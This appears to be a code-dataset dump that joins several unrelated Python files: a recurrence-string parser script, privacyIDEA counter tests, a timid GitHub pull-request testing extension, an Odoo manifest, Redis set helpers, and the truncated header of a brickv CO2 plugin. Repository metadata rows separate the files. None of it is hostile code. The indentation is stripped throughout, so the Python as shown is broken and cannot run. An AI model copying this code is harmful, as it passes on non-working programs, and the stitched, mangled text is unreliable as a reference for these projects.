#test = "every month on last sunday,monday starting _October_15_2012_8:00PM ending _April_1_2014 at 8:00PM lasting 120 minutes in America/Los_Angeles"
#test = "every month day 4 starting _October_1_2013 ending _April_1_2014 at 8:00PM lasting 2 hours in America/Los_Angeles"
#test = "every weeks on tuesday,monday at 9:00PM lasting 6 hours in America/Los_Angeles"
test = "once starting _05/23/2015_08:00_PM ending _05/23/2015_11:00_PM in US/Pacific"
z = get_class(test)
def localize(time,timezone):
return timezone.normalize(time.astimezone(timezone))
z.verify()
z.parse()
print z.canonicalize()
#print z.occurences().__hash__()
#print "FROM HERE"
#for block in z.occurences().get_blocks():
# print block.__hash__()
# for o in block.get_occurences():
# pass
#print o.__hash__()
# print "\n\n"
#start = localize(start,z.timezone)
#end = localize(end,z.timezone)
#print start
#print start.isoweekday()
#print end
#print end.isoweekday()
#print "\n\n---"
"""
from upoutdf.snapping import SnapLogical
from dateutil import parser
import pytz
tz = pytz.timezone('America/Los_Angeles')
date = parser.parse("February 5, 2014")
date = tz.localize(date)
date = pytz.utc.normalize(date.astimezone(pytz.utc))
snapper = SnapLogical(tz)
print snapper.snap_to_month_weekday(date,5,'last')
"""
"""
FORMATS:
RECURRING:
every (int) <year(s) (day <int>)| month(s) on <<1st,2nd,3rd,4th,5th,last> <m,t,w,tr,f,sa,s> | day <int>> | week(s) on <m,t,w,tr,f,sa,s> | day(s)> (starting <datetimestring>) (ending <datetimestring>) (repeating <int> times) at <timestamp> lasting <int> <hours,minutes,seconds> in <timezone>
SINGLE:
once starting <datetimestring> ending <datetimestring> in America/Los_Angeles
Both starting and ending are inclusive
every [int] [years/months/weeks/days] [day][on] [dow] [int] starting [date] ending [date] at [time] lasting[hours]
every month on 3rd thursday at 9:00PM lasting 6 hours in America/Los_Angeles
3rd thursday of every month
At 9:00pm until 3AM
every 1 year at TIMESTAMP lasting 4 hours in America/Los_Angeles
every week starting TIMESTAMP ending TIMESTAMP at TIMESTAMP until TIMESTAMP in America/New_York_City
""" | mit | 8,324,564,143,246,006,000 | 29.253333 | 298 | 0.701499 | false |
privacyidea/privacyidea | tests/test_lib_counter.py | 1 | 5817 | """
This tests the files
lib/counter.py
"""
import mock
from contextlib import contextmanager
from .base import MyTestCase
from privacyidea.lib.counter import increase, decrease, reset, read
from privacyidea.models import EventCounter
def increase_and_read(name):
""" helper function that increases the event counter and returns the new value """
increase(name)
return read(name)
def decrease_and_read(name, allow_negative=False):
""" helper function that decreases the event counter and returns the new value """
decrease(name, allow_negative=allow_negative)
return read(name)
class CounterTestCase(MyTestCase):
"""
Test the counter module
"""
def setUp(self):
pass
def tearDown(self):
pass
def test_00_create_and_increase(self):
r = increase_and_read("hallo_counter")
self.assertEqual(r, 1)
r = increase_and_read("counter2")
self.assertEqual(r, 1)
r = increase_and_read("hallo_counter")
self.assertEqual(r, 2)
counter = EventCounter.query.filter_by(counter_name="hallo_counter").first()
self.assertEqual(counter.counter_value, 2)
def test_01_increase_and_decrease(self):
r = increase_and_read("hallo_counter1")
self.assertEqual(r, 1)
for x in range(1, 5):
increase("hallo_counter1")
counter = EventCounter.query.filter_by(counter_name="hallo_counter1").first()
self.assertEqual(counter.counter_value, 5)
r = decrease_and_read("hallo_counter1")
self.assertEqual(r, 4)
for x in range(1, 8):
decrease("hallo_counter1")
counter = EventCounter.query.filter_by(counter_name="hallo_counter1").first()
self.assertEqual(counter.counter_value, 0)
# Test reading counter
r = read("hallo_counter1")
self.assertEqual(r, 0)
r = read("unknown counter")
self.assertEqual(r, None)
def test_02_decrease_beyond_zero(self):
r = increase_and_read("hallo_counter2")
self.assertEqual(r, 1)
for x in range(1, 8):
decrease("hallo_counter2", allow_negative=True)
counter = EventCounter.query.filter_by(counter_name="hallo_counter2").first()
self.assertEqual(counter.counter_value, -6)
def test_03_decrease_and_reset(self):
r = decrease_and_read("hallo_counter3", allow_negative=True)
self.assertEqual(r, -1)
reset("hallo_counter3")
counter = EventCounter.query.filter_by(counter_name="hallo_counter3").first()
self.assertEqual(counter.counter_value, 0)
def test_04_reset_non_existing_counter(self):
reset("hallo_counter4")
counter = EventCounter.query.filter_by(counter_name="hallo_counter4").first()
self.assertEqual(counter.counter_value, 0)
def test_05_multiple_nodes(self):
@contextmanager
def _set_node(node):
""" context manager that sets the current node name """
with mock.patch("privacyidea.lib.counter.get_privacyidea_node") as mock_node:
mock_node.return_value = node
yield
# two nodes node1 and node2, two counters ctrA and ctrB
with _set_node("node1"):
for _ in range(3):
increase("ctrA")
increase("ctrB")
with _set_node("node2"):
r = increase_and_read("ctrB")
self.assertEqual(r, 2)
# sums are correct ...
self.assertEqual(read("ctrA"), 3)
self.assertEqual(read("ctrB"), 2)
# ... and each node has written to its own row
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrA", node="node1").one().counter_value, 3)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrA", node="node2").all(), [])
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 1)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, 1)
# decreasing ctrB on node2 by 2 creates a row with negative value, even if allow_negative=False
with _set_node("node2"):
for _ in range(2):
decrease("ctrB", allow_negative=False)
self.assertEqual(read("ctrB"), 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 1)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, -1)
# decreasing below the sum of 0 causes all values to be reset
with _set_node("node2"):
decrease("ctrB", allow_negative=False)
self.assertEqual(read("ctrB"), 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, 0)
# decreasing with allow_negative=True works
with _set_node("node1"):
decrease("ctrB", allow_negative=True)
with _set_node("node2"):
decrease("ctrB", allow_negative=True)
self.assertEqual(read("ctrB"), -2)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, -1)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, -1)
# resetting resets all rows
reset("ctrB")
self.assertEqual(read("ctrB"), 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node1").one().counter_value, 0)
self.assertEqual(EventCounter.query.filter_by(counter_name="ctrB", node="node2").one().counter_value, 0) | agpl-3.0 | -1,479,203,389,174,188,800 | 36.535484 | 113 | 0.63727 | false |
rackerlabs/timid-github | timid_github.py | 1 | 33572 | # Copyright 2016 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS
# IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import errno
import getpass
import inspect
import json
import os
import shutil
import stat
import subprocess
import sys
import time
import github
import keyring
import six
import timid
SSH_ERROR = b'ssh_exchange_identification: Connection closed by remote host'
class GitException(Exception):
"""
An exception to be thrown in the event of an error observed while
executing the "git" command.
"""
def __init__(self, message, result=None):
"""
Initialize a ``GitException`` object.
:param message: The exception message.
:param result: An optional ``timid.StepResult`` object.
"""
# Initialize the superclass
super(GitException, self).__init__(message)
self.result = result
def exc_to_result(func):
"""
A decorator to convert an exception into an appropriate
``timid.StepResult``. This wrapper special-cases the
``GitException`` to return the contents of the ``result``
attribute.
:param func: The function to wrap.
:returns: The wrapped function.
"""
@six.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except GitException as e:
return e.result
except Exception:
return timid.StepResult(exc_info=sys.exc_info())
return wrapper
def _git(ctxt, *args, **kwargs):
"""
Invoke a "git" subcommand.
:param ctxt: The context object.
:param args: Positional arguments, specified as strings; the first
must be a "git" subcommand, and remaining arguments
will be passed to that subcommand.
:param ssh_retries: A keyword-only parameter specifying the number
of retries to attempt. If the command fails
due to an SSH error, the command will be
retried up to this many times. This does not
impact failures due to other connection
errors. Defaults to ``1``.
:param do_raise: A keyword-only parameter specifying whether to
raise exceptions in the event of command
failures. If ``False``, no exception will be
raised. Defaults to ``True``.
:returns: The contents of standard output.
"""
# Extract keyword-only parameters
ssh_retries = kwargs.get('ssh_retries', 1)
do_raise = kwargs.get('do_raise', True)
# Construct the full command
cmd = ['git']
cmd.extend(args)
# Construct the command text for debugging and error output
cmd_text = ' '.join(six.moves.shlex_quote(c) for c in cmd)
# Loop the requisite number of times, with appropriate sleeps
sleep_time = 1
num_tries = 0
while num_tries < ssh_retries:
num_tries += 1
if num_tries > 1:
# Second or subsequent try; sleep with exponential backoff
time.sleep(sleep_time)
sleep_time <<= 1
ctxt.emit('Retry %d of %d: retrying command "%s"' %
(num_tries, ssh_retries, cmd_text), debug=True)
else:
ctxt.emit('Executing command "%s"' % cmd_text, debug=True)
# Run the command
child = ctxt.environment.call(
cmd, close_fds=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = child.communicate()
ctxt.emit('Command result: return code %d, stdout %r, stderr %r' %
(child.returncode, stdout, stderr), debug=True)
# Do we need to retry?
if child.returncode and (SSH_ERROR in stdout or SSH_ERROR in stderr):
ctxt.emit('Retrying command after a sleep of %d seconds' %
sleep_time, debug=True)
continue
# We have executed it!
break
else:
ctxt.emit('Too many tries, exiting instead', debug=True)
if do_raise and child.returncode:
# Include stdout
text = stdout.strip()
if text:
msg = ('Git command "%s" returned %d: %s' %
(cmd_text, child.returncode, text))
else:
msg = ('Git command "%s" returned %d' %
(cmd_text, child.returncode))
# Raise the exception
result = timid.StepResult(state=timid.ERROR, msg=msg,
returncode=child.returncode)
raise GitException(msg, result)
# Return the standard output
return stdout
class CloneAction(timid.Action):
"""
A Timid action that will clone the target repository. The
repository will be cloned into the working directory. This action
cannot appear in the test description, as it is implicitly added
by the ``GithubExtension`` extension.
"""
schema = None
def __init__(self, ctxt, ghe):
"""
Initialize a ``CloneAction`` instance.
:param ghe: An instance of ``GithubExtension``.
"""
# Initialize the superclass
super(CloneAction, self).__init__(ctxt, '__clone__', None, None)
# Store the github extension instance
self.ghe = ghe
def validate_conf(self, name, config, step_addr):
"""
Validate configuration. This action does not take a
configuration, so the ``validate_conf()`` method is overridden
to inhibit validation.
:param name: The name of the action or modifier.
:param config: The actual configuration.
:param step_addr: The address of the step in the test
configuration.
"""
pass # pragma: no cover
@exc_to_result
def __call__(self, ctxt):
"""
Invoke the action. This method will clone the repository into the
correct directory, then switch to that directory.
:param ctxt: The context object.
:returns: A ``StepResult`` object.
"""
# First step, see if the repository exists
work_dir = ctxt.environment.cwd
repo_dir = os.path.join(work_dir, self.ghe.repo_name)
try:
dir_data = os.lstat(repo_dir)
except OSError as e:
# Re-raise the error if it's not ENOENT
if e.errno != errno.ENOENT:
msg = 'Unable to stat repo directory %s' % repo_dir
return timid.StepResult(msg=msg, exc_info=sys.exc_info())
# OK, safe to clone from scratch
return self._clone(work_dir, repo_dir, ctxt)
# Hmmm, the file exists; is it a directory?
if not stat.S_ISDIR(dir_data.st_mode):
# OK, we control the workdir, so delete the extraneous
# file and clone from scratch
ctxt.emit('Deleting file shadowing repository directory %s' %
repo_dir, level=2)
os.remove(repo_dir)
return self._clone(work_dir, repo_dir, ctxt)
# It's a directory; is it a repository?
if os.path.isdir(os.path.join(repo_dir, '.git')):
# Try updating the base branch
try:
ctxt.environment.cwd = repo_dir
return self._update(ctxt)
except Exception:
# Failed to update, so back out of the directory
# temporarily
ctxt.emit('Failed to update existing repository in '
'directory %s; starting from scratch' % repo_dir)
ctxt.environment.cwd = work_dir
# Not a repository, or couldn't update; blow it away and try
# cloning from scratch
ctxt.emit('Deleting directory tree shadowing repository directory %s' %
repo_dir, level=2)
shutil.rmtree(repo_dir)
return self._clone(work_dir, repo_dir, ctxt)
def _clone(self, work_dir, target_dir, ctxt):
"""
Clones the base repository into the specified target directory.
:param work_dir: The current working directory. This is used
to restore the environment working directory
in the event that the later call to
``self._update()`` fails.
:param target_dir: The directory into which the repository
should be checked out.
:param ctxt: The context object.
"""
# Begin by cloning the repository
ctxt.emit('Cloning repository from %s into directory %s' %
(self.ghe.repo_url, target_dir))
_git(ctxt, 'clone', self.ghe.repo_url, target_dir, ssh_retries=5)
# Change to the target directory and fetch any changes
try:
ctxt.environment.cwd = target_dir
return self._update(ctxt)
except Exception:
exc_info = sys.exc_info()
# Reset the directory
ctxt.environment.cwd = work_dir
# Re-raise the exception
six.reraise(*exc_info)
def _update(self, ctxt):
"""
Updates the repository, assumed to be the current working
directory, from the specified base repository.
:param ctxt: The context object.
:returns: A ``timid.StepResult`` object.
"""
ctxt.emit('Updating repository from upstream data')
# Ensure the remote is set properly
_git(ctxt, 'remote', 'set-url', 'origin', self.ghe.repo_url)
# Do some initial resets
ctxt.emit('Cleaning up repository...', level=2)
_git(ctxt, 'rebase', '--abort', do_raise=False)
_git(ctxt, 'checkout', '-f', self.ghe.repo_branch)
_git(ctxt, 'reset', '--hard', 'origin/%s' % self.ghe.repo_branch)
_git(ctxt, 'clean', '-fdx')
# And check out the designated branch
ctxt.emit('Checking out most recent version of branch %s' %
self.ghe.repo_branch, level=2)
_git(ctxt, 'fetch', 'origin', self.ghe.repo_branch, ssh_retries=5)
_git(ctxt, 'checkout', self.ghe.repo_branch)
return timid.StepResult(state=timid.SUCCESS)
class MergeAction(timid.Action):
"""
A Timid action that will prepare a repository by creating and
checking out a topic branch and merging the pull request into that
branch. This action cannot appear in the test description, as it
is implicitly added by the ``GithubExtension`` extension.
"""
schema = None
def __init__(self, ctxt, ghe):
"""
Initialize a ``MergeAction`` instance.
:param ghe: An instance of ``GithubExtension``.
"""
# Initialize the superclass
super(MergeAction, self).__init__(ctxt, '__merge__', None, None)
# Store the github extension instance
self.ghe = ghe
def validate_conf(self, name, config, step_addr):
"""
Validate configuration. This action does not take a
configuration, so the ``validate_conf()`` method is overridden
to inhibit validation.
:param name: The name of the action or modifier.
:param config: The actual configuration.
:param step_addr: The address of the step in the test
configuration.
"""
pass # pragma: no cover
@exc_to_result
def __call__(self, ctxt):
"""
Invoke the action. This method will create the appropriate branch
and merge the pull request into it.
:param ctxt: The context object.
:returns: A ``StepResult`` object.
"""
# Compute a branch name
local_branch = ('%s-%s' %
(self.ghe.pull.user.login, self.ghe.change_branch))
ctxt.emit('Cloning pull request from %s branch %s '
'into local branch %s' %
(self.ghe.pull.user.login, self.ghe.change_branch,
local_branch))
# Make sure the branch doesn't already exist
_git(ctxt, 'branch', '-D', local_branch, do_raise=False)
# Create the branch
_git(ctxt, 'checkout', '-b', local_branch, self.ghe.repo_branch)
_git(ctxt, 'pull', self.ghe.change_url, self.ghe.change_branch)
# Merge the change
ctxt.emit('Merging the change into branch %s' % self.ghe.repo_branch)
_git(ctxt, 'checkout', self.ghe.repo_branch)
_git(ctxt, 'merge', local_branch)
return timid.StepResult(state=timid.SUCCESS)
# A mapping of URL string to the attribute of the repository object
# containing the desired URL.
URL_ATTR = {
'ssh': 'ssh_url',
'git': 'git_url',
'https': 'clone_url',
}
def _select_url(repo_url, repo_obj):
"""
Select the appropriate repository URL.
:param repo_url: The URL to select. May be "ssh", "git", or
"https" to select the appropriate URL from the
``repo_obj``, or may be a verbatim repository
URL.
:param repo_obj: An instance of ``github.Repository.Repository``.
:returns: The appropriate repository URL.
"""
# If it's one of the defined ones, return the appropriate
# attribute
if repo_url in URL_ATTR:
return getattr(repo_obj, URL_ATTR[repo_url])
# Verbatim URL; return it unchanged
return repo_url
class GithubExtension(timid.Extension):
"""
A Timid extension that provides integration with Github. This
will allow a pull request to be tested directly by Timid. Testing
includes making status updates to the pull request for each step
in the testing procedure, with a final "success" or "failure"
status at the conclusion of testing, with an optional override for
"success" status.
"""
priority = 50
@classmethod
def prepare(cls, parser):
"""
Called to prepare the extension. The extension is prepared during
argument parser preparation. An extension implementing this
method is able to add command line arguments specific for that
extension. Note that this is a class method; the extension
will not be instantiated prior to calling this method, nor
should this method attempt to initialize the extension.
:param parser: The argument parser, an instance of
``argparse.ArgumentParser``.
"""
# Begin by grouping the extension arguments
group = parser.add_argument_group(
'Github Integration', 'Options for integrating with Github.',
)
# Authentication options
group.add_argument(
'--github-api',
default=os.environ.get('TIMID_GITHUB_API',
'https://api.github.com'),
help='Designate the Github API for the instance of Github to '
'search for the pull request. Default is drawn from the '
'"TIMID_GITHUB_API" environment variable. Default: %(default)s',
)
group.add_argument(
'--github-user',
default=os.environ.get('TIMID_GITHUB_USER', getpass.getuser()),
help='Designate the username to use to authenticate to the '
'Github API. Default is drawn from the "TIMID_GITHUB_USER" '
'environment variable. Default: %(default)s',
)
group.add_argument(
'--github-pass',
default=os.environ.get('TIMID_GITHUB_PASS'),
help='Designate the password to use to authenticate to the '
'Github API. If not provided, and not available from the '
'keyring, will be prompted for.',
)
group.add_argument(
'--github-keyring-set',
default=False,
action='store_true',
help='Enable setting the password in the keyring. The entry '
'will be keyed by the Github API URL and by the username.',
)
# The pull request to test
group.add_argument(
'--github-pull',
help='Designate the pull request to test. This may be the '
'repository name and pull request number (e.g., "repo#1" or '
'"org/repo#1"), or a JSON object describing the pull request '
'(deprecated usage). This is the only option that enables the '
'Github extension.',
)
# The repository to pull from
group.add_argument(
'--github-repo',
default='git',
help='Designate the repository URL to clone from. This may '
'be the full URL to the repository, or it may be one of the '
'tokens "ssh", "git", or "https", designating to use the '
'specified access method from the repository specified in the '
'Github pull request. Default: %(default)s.',
)
# The repository to pull from
group.add_argument(
'--github-change-repo',
help='Designate the repository URL to merge the pull request '
'from. This may be the full URL to the repository, or it may '
'be one of the tokens "ssh", "git", or "https", designating to '
'use the specified access method from the repository specified '
'in the Github pull request. Defaults to the same method as '
'selected for --github-repo.',
)
# Some control options
group.add_argument(
'--github-status-url',
help='A URL to include in status updates made on the pull '
'request. Optional.',
)
# Override options
group.add_argument(
'--github-override',
help='DEPRECATED. Accepts a JSON object describing the status '
'to use in place of a successful status resulting from the test. '
'The JSON object should be a dictionary containing the "status" '
'key designating the final status (replaced by '
'"--github-override-status"). Optionally, the "text" key '
'(replaced by "--github-override-text") designates the status '
'text, and the "url" key (replaced by "--github-override-url") '
'designates the status URL.',
)
group.add_argument(
'--github-override-status',
choices=['pending', 'error', 'failure'],
help='Specifies an alternate status to use if tests complete '
'successfully. Must be "pending", "error", or "failure". If '
'used with "--github-override", this option takes precedence.',
)
group.add_argument(
'--github-override-text',
help='Specifies status text to include with the override '
'status specified by "--github-override-status". If used with '
'"--github-override", this option takes precedence.',
)
group.add_argument(
'--github-override-url',
help='Specifies a status URL to include with the override '
'status specified by "--github-override-status". If used with '
'"--github-override", this option takes precedence.',
)
@classmethod
def activate(cls, ctxt, args):
"""
Called to determine whether to activate the extension. This call
is made after processing command line arguments, and must
return either ``None`` or an initialized instance of the
extension. Note that this is a class method.
:param ctxt: An instance of ``timid.context.Context``.
:param args: An instance of ``argparse.Namespace`` containing
the result of processing command line arguments.
:returns: An instance of the extension class if the extension
has been activated, ``None`` if it has not. If this
method returns ``None``, no further extension
methods will be called.
"""
# If no pull request was specified, do nothing
if not args.github_pull:
return None
ctxt.emit('Github plugin activated')
# Ensure we have a password
service = 'timid-github!%s' % args.github_api
passwd = args.github_pass
if passwd is None and not args.github_keyring_set:
# Try getting it from the keyring
passwd = keyring.get_password(service, args.github_user)
if passwd is None:
# OK, try prompting for it
passwd = getpass.getpass('[%s] Password for "%s"> ' %
(args.github_api, args.github_user))
# Are we supposed to set it?
if args.github_keyring_set:
ctxt.emit('Saving password in keyring as requested')
keyring.set_password(service, args.github_user, passwd)
# Now we have authentication information, get a Github handle
gh = github.Github(args.github_user, passwd, args.github_api)
# Next, interpret the pull request designation
try:
# Try JSON first
pull_raw = json.loads(args.github_pull)
except ValueError:
# Raw string
repo, _sep, number = args.github_pull.partition('#')
# Interpret the number
if not number or not number.isdigit():
sys.exit('Invalid pull request number "%s"' % number)
number = int(number)
# Interpret the repo
if '/' not in repo:
user = gh.get_user()
repo = '%s/%s' % (user.login, repo)
# Look up the pull request
try:
repo = gh.get_repo(repo)
pull = repo.get_pull(number)
except Exception:
# No such pull request, I guess
sys.exit('Unable to resolve pull request "%s"' %
args.github_pull)
else:
# OK, we have raw JSON data; wrap it in a PullRequest
pull = gh.create_from_raw_data(
github.PullRequest.PullRequest, pull_raw)
ctxt.emit('Testing pull request %s#%d' %
(pull.base.repo.full_name, pull.number))
# Need the repository name
repo_name = pull.base.repo.name
# Also need the branches
repo_branch = pull.base.ref
change_branch = pull.head.ref
# Select the correct repository URL
repo_url = _select_url(args.github_repo, pull.base.repo)
ctxt.emit('Base repository %s' % repo_url, level=2)
# Select the correct change repository URL. If not
# independently specified, default to the same as the
# repo_url. Note: the URLs could legally be the same, as a PR
# could be made from one branch to another of the same
# repository.
change_url = _select_url(args.github_change_repo or args.github_repo,
pull.head.repo)
ctxt.emit('PR repository %s' % change_url, level=2)
# With the pull, we need to select an appropriate commit
last_commit = list(pull.get_commits())[-1]
# Set up the final status information
final_status = {
'status': 'success',
'text': 'Tests passed!',
'url': args.github_status_url,
}
# Handle the --github-override option
if args.github_override:
try:
override_raw = json.loads(args.github_override)
for key in final_status:
if key in override_raw:
final_status[key] = override_raw[key]
except ValueError:
pass
# Now we process the other override options
if args.github_override_status:
final_status['status'] = args.github_override_status
if args.github_override_text:
final_status['text'] = args.github_override_text
if args.github_override_url:
final_status['url'] = args.github_override_url
# Set some variables in the context for the use of any callers
ctxt.variables.declare_sensitive('github_api_password')
ctxt.variables.update({
'github_api': args.github_api,
'github_api_username': args.github_user,
'github_api_password': passwd,
'github_repo_name': repo_name,
'github_pull': '%s#%d' % (pull.base.repo.full_name, pull.number),
'github_base_repo': repo_url,
'github_base_branch': repo_branch,
'github_change_repo': change_url,
'github_change_branch': change_branch,
'github_success_status': final_status['status'],
'github_success_text': final_status['text'],
'github_success_url': final_status['url'],
'github_status_url': args.github_status_url,
})
# We are all set; initialize the extension
return cls(gh, pull, last_commit, args.github_status_url, final_status,
repo_name, repo_url, repo_branch, change_url, change_branch)
def __init__(self, gh, pull, last_commit, status_url, final_status,
repo_name, repo_url, repo_branch, change_url, change_branch):
"""
Initialize the ``GithubExtension`` instance.
:param gh: A ``github.Github`` object representing a handle
for interacting with the Github API.
:param pull: A ``github.PullRequest.PullRequest`` object
describing the pull request being tested.
:param last_commit: A ``github.Commit.Commit`` object
identifying the last commit contained in
the pull request. This is used for
updating the pull request status.
:param status_url: An optional status URL to include in the
status updates. If none is provided, use
``None``.
:param final_status: A dictionary of three keys: "status",
"text", and "url". This is used to set
the final status of the pull request
should tests pass.
:param repo_name: The bare name of the repository, excluding
the organization or user name.
:param repo_url: The repository URL to clone from.
:param repo_branch: The branch of the repository into which to
merge the pull request.
:param change_url: The repository URL of the repository
containing the pull request.
:param change_branch: The branch of the change repository from
which to merge the pull request.
"""
# Save the important data
self.gh = gh
self.pull = pull
self.last_commit = last_commit
self.status_url = status_url
self.final_status = final_status
self.repo_name = repo_name
self.repo_url = repo_url
self.repo_branch = repo_branch
self.change_url = change_url
self.change_branch = change_branch
# Remember what the last status was
self.last_status = None
def _set_status(self, ctxt, status, text=None, url=None):
"""
A helper method to set the status of a pull request.
:param ctxt: An instance of ``timid.context.Context``.
:param status: The desired status. Should be one of the
values "pending", "success", "failure", or
"error".
:param text: An optional textual description of the status.
:param url: An optional URL for the status.
"""
# Set the status
self.last_commit.create_status(
status,
url or github.GithubObject.NotSet,
text or github.GithubObject.NotSet,
)
ctxt.emit('Changing status to "%s" (text "%s"%s%s)' %
(status, text, ', url ' if url else '', url or ''),
debug=True)
# Remember it so we only make calls we need to
self.last_status = {
'status': status,
'text': text,
'url': url,
}
def read_steps(self, ctxt, steps):
"""
Called after reading steps, prior to adding them to the list of
test steps. This allows an extension to alter the list (in
place).
:param ctxt: An instance of ``timid.context.Context``.
:param steps: A list of ``timid.steps.Step`` instances.
"""
# Get our file name
fname = inspect.getsourcefile(self.__class__)
# Prepend our steps to the list of steps read
ctxt.emit('Prepending clone and merge steps', debug=True)
steps[0:0] = [
# First step will be to clone the repository
timid.Step(timid.StepAddress(fname, 0),
CloneAction(ctxt, self),
name='Cloning repository',
description='Clone the Github repository'),
# Second step will be to merge the pull request
timid.Step(timid.StepAddress(fname, 1),
MergeAction(ctxt, self),
name='Merging pull request',
description='Merge the Github pull request'),
]
def pre_step(self, ctxt, step, idx):
"""
Called prior to executing a step.
:param ctxt: An instance of ``timid.context.Context``.
:param step: An instance of ``timid.steps.Step`` describing
the step to be executed.
:param idx: The index of the step in the list of steps.
:returns: A ``True`` value if the step is to be skipped. Any
``False`` value (including ``None``) will result in
the step being executed as normal.
"""
# Update the pull request status
self._set_status(ctxt, 'pending', step.name, self.status_url)
return None
def post_step(self, ctxt, step, idx, result):
"""
Called after executing a step.
:param ctxt: An instance of ``timid.context.Context``.
:param step: An instance of ``timid.steps.Step`` describing
the step that was executed.
:param idx: The index of the step in the list of steps.
:param result: An instance of ``timid.steps.StepResult``
describing the result of executing the step.
May be altered by the extension, e.g., to set
the ``ignore`` attribute.
"""
if not result:
# The step failed; compute a status update
msg = result.msg
if result.state == timid.FAILURE:
status = 'failure'
if not msg:
msg = 'Failed: %s' % step.name
else:
status = 'error'
if not msg:
if result.state != timid.ERROR:
msg = ('Unknown timid state "%s" during step: %s' %
(result.state, step.name))
else:
msg = 'Error: %s' % step.name
# Update the status
self._set_status(ctxt, status, msg, self.status_url)
def finalize(self, ctxt, result):
"""
Called at the end of processing. This call allows the extension
to emit any additional data, such as timing information, prior
to ``timid``'s exit. The extension may also alter the return
value.
:param ctxt: An instance of ``timid.context.Context``.
:param result: The return value of the basic ``timid`` call,
or an ``Exception`` instance if an exception
was raised. Without the extension, this would
be passed directly to ``sys.exit()``.
:returns: Should return ``result`` unless the extension wishes
to change the return value.
"""
# If result is None, update the status to success
if result is None:
self._set_status(ctxt, **self.final_status)
elif isinstance(result, Exception):
# An exception occurred while running timid; log it as an
# error status
self._set_status(ctxt, 'error',
'Exception while running timid: %s' % result,
self.status_url)
elif self.last_status and self.last_status['status'] == 'pending':
# A test failed and we haven't reported it; do so
self._set_status(ctxt, 'failure', 'Testing failed: %s' % result,
self.status_url)
return result
| apache-2.0 | -739,504,360,498,348,800 | 36.721348 | 79 | 0.573365 | false |
maljac/odoo-addons | report_extended_purchase/__openerp__.py | 1 | 1599 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Report Configurator - Purchase',
'version': '1.0',
'category': 'Reporting Subsystem',
'sequence': 14,
'summary': '',
'description': """
Report Configurator - Purchase
==============================
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'report_extended',
'purchase',
],
'data': [
'views/report_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': True,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,613,577,968,119,786,000 | 30.98 | 78 | 0.554096 | false |
j4mie/rediset | rediset/sets.py | 1 | 1992 | from .base import Node, OperationNode
class SetNode(Node):
"""
Represents a Redis set
Note that this class does *not* try too hard to look like a Python
set. For example, you cannot pass an iterable into its constructor
to provide the members of the set. This is because a set in Redis
may or may not already contain elements. A non-existent set in Redis
is equivalent to an existing set with zero items. So this class should
be thought of as an interface to an *existing* Redis set, providing
an API to add or remove elements.
"""
def __init__(self, rediset, key):
self.rs = rediset
self.key = key
def add(self, *values):
self.rs.redis.sadd(self.prefixed_key, *values)
def remove(self, *values):
self.rs.redis.srem(self.prefixed_key, *values)
class IntersectionNode(OperationNode):
"""
Represents the result of an intersection of one or more other sets
"""
@property
def key(self):
return "intersection(%s)" % ",".join(sorted(self.child_keys()))
def perform_operation(self):
return self.rs.redis.sinterstore(self.prefixed_key, self.prefixed_child_keys())
class UnionNode(OperationNode):
"""
Represents the result of a union of one or more other sets
"""
@property
def key(self):
return "union(%s)" % ",".join(sorted(self.child_keys()))
def perform_operation(self):
return self.rs.redis.sunionstore(self.prefixed_key, self.prefixed_child_keys())
class DifferenceNode(OperationNode):
"""
Represents the result of the difference between the first set
and all the successive sets
"""
@property
def key(self):
child_keys = self.child_keys()
child_keys = child_keys[0:1] + sorted(child_keys[1:])
return "difference(%s)" % ",".join(child_keys)
def perform_operation(self):
return self.rs.redis.sdiffstore(self.prefixed_key, self.prefixed_child_keys())
| unlicense | 551,889,515,070,679,300 | 27.056338 | 87 | 0.659137 | false |
Tinkerforge/brickv | src/brickv/plugin_system/plugins/co2_v2/co2_v2.py | 1 | 3550 | # -*- coding: utf-8 -*-
"""
CO2 2.0 Plugin
Copyright (C) 2019 Olaf Lüke <[email protected]>
co2_v2.py: CO2 2.0 Plugin Implementation
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
